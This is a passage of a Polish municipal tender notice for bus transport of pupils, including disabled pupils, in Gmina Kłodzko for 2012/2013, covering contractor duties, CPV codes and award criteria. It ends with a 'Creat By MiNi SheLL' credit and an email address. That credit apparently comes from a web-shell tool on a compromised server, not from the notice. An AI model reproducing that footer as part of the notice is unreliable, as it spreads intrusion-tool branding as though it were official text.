i kodeksu drogowego, przez osoby mające odpowiednie uprawnienia do świadczenia tych usług. Wykonawca powinien zapewnić odpowiednią liczbę miejsc siedzących do wymagań danej trasy. W przypadku awarii środka transportowego Wykonawca zapewni zastępczy środek transportu, w taki sposób, aby nie powodować opóźnień czasowych kursu. Wykonawca ponosi pełną odpowiedzialność za bezpieczeństwo przewożonych uczniów, 
w tym sprawuje opiekę nad uczniami w czasie przewozu. Opieka sprawowana jest przez opiekunów ( nie kierowcę ), którzy posiadają jednolite stroje z napisem  OPIEKUN . Do obowiązków opiekunów należy także pomoc przy wsiadaniu i wysiadaniu z pojazdu.  Wykonawca musi zapewnić przewożonym uczniom odpowiednie warunki bezpieczeństwa 
i higieny tj.: utrzymywać w czystości i porządku pojazdy, przestrzegać przepisów P.Poż. 
i BHP, ubezpieczyć pojazdy na czas przewozu z tytułu szkody, które mogą wyniknąć 
w związku z wykonywaniem zamówienia, oznaczyć pojazd na czas przewozu wykorzystywany do transportu dzieci szkolnych. Wykonawca jest odpowiedzialny za jakość, zgodność z warunkami technicznymi i jakościowymi opisanymi dla przedmiotu zamówienia. Wymagana jest należyta staranność przy realizacji zobowiązań. Zamawiający nie ponosi odpowiedzialności za szkody wyrządzone przez Wykonawcę podczas wykonywania przedmiotu zamówienia.  
Zamawiający zastrzega, że liczba dowożonych uczniów w trakcie roku szkolnego może ulec zmianie, a Wykonawca zobowiązany jest na tę okoliczność do zapewnienia środka transportu z odpowiednią liczbą miejsc w ramach tej samej ceny brutto za kilometr. 
Dopuszcza się możliwość udzielenia zamówień uzupełniających do 20 % wartości  zamówienia podstawowego w sytuacjach wynikłych z organizacji roku szkolnego.    

Dowóz obejmuje okres od dnia 1 września 2012 r. do końca zajęć dydaktyczno wychowawczych w roku szkolnym 2012/2013..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 60.11.20.00-6, 60.14.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.09.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dowóz i odwóz uczniów  zamieszkałych na terenie Gminy Kłodzko do jednostek oświatowych Gminy Kłodzko oraz uczniów niepełnosprawnych zamieszkałych na terenie Gminy Kłodzko do Niepublicznej Szkoły Podstawowej Specjalnej przy Domu Pomocy Społecznej dla Dzieci w Ludwikowicach Kłodzkich.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Charakterystykę powyższych zadań stanowi załącznik nr 1 do opisu przedmiotu zamówienia.
 

 UWAGA: 	uczniowie wsiadają rano najwcześniej o godzinie 7.00
		 


¨Wykonawca zobowiązany jest wykonać przedmiot umowy z wykorzystaniem własnych środków transportowych odpowiadających wymogom określonym w ustawie o transporcie drogowym. Usługi objęte zamówieniem mają być świadczone środkami transportu przystosowanymi do przewozu uczniów, spełniającymi wszystkie wymogi bezpieczeństwa 
i kodeksu drogowego, przez osoby mające odpowiednie uprawnienia do świadczenia tych usług. Wykonawca powinien zapewnić odpowiednią liczbę miejsc siedzących do wymagań danej trasy. W przypadku awarii środka transportowego Wykonawca zapewni zastępczy środek transportu, w taki sposób, aby nie powodować opóźnień czasowych kursu. Wykonawca ponosi pełną odpowiedzialność za bezpieczeństwo przewożonych uczniów, 
w tym sprawuje opiekę nad uczniami w czasie przewozu. Opieka sprawowana jest przez opiekunów ( nie kierowcę ), którzy posiadają jednolite stroje z napisem  OPIEKUN . 
Do obowiązków opiekunów należy także pomoc przy wsiadaniu i wysiadaniu z pojazdu.  Wykonawca musi zapewnić przewożonym uczniom odpowiednie warunki bezpieczeństwa 
i higieny tj.: utrzymywać w czystości i porządku pojazdy, przestrzegać przepisów P.Poż. 
i BHP, ubezpieczyć pojazdy na czas przewozu z tytułu szkody, które mogą wyniknąć 
w związku z wykonywaniem zamówienia, oznaczyć pojazd na czas przewozu wykorzystywany do transportu dzieci szkolnych. Wykonawca jest odpowiedzialny za jakość, zgodność z warunkami technicznymi i jakościowymi opisanymi dla przedmiotu zamówienia. Wymagana jest należyta staranność przy realizacji zobowiązań. Zamawiający nie ponosi odpowiedzialności za szkody wyrządzone przez Wykonawcę podczas wykonywania przedmiotu zamówienia.  
Zamawiający zastrzega, że liczba dowożonych uczniów w trakcie roku szkolnego może ulec zmianie, a Wykonawca zobowiązany jest na tę okoliczność do zapewnienia środka transportu z odpowiednią liczbą miejsc w ramach tej samej ceny brutto za kilometr. .    
Dopuszcza się możliwość udzielenia zamówień uzupełniających do 20 % wartości  zamówienia podstawowego w sytuacjach wynikłych z organizacji roku szkolnego.

Dowóz obejmuje okres od dnia 1 września 2012 r. do końca zajęć dydaktyczno wychowawczych w roku szkolnym 2012/2013..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 60.11.20.00-6, 60.14.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.09.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com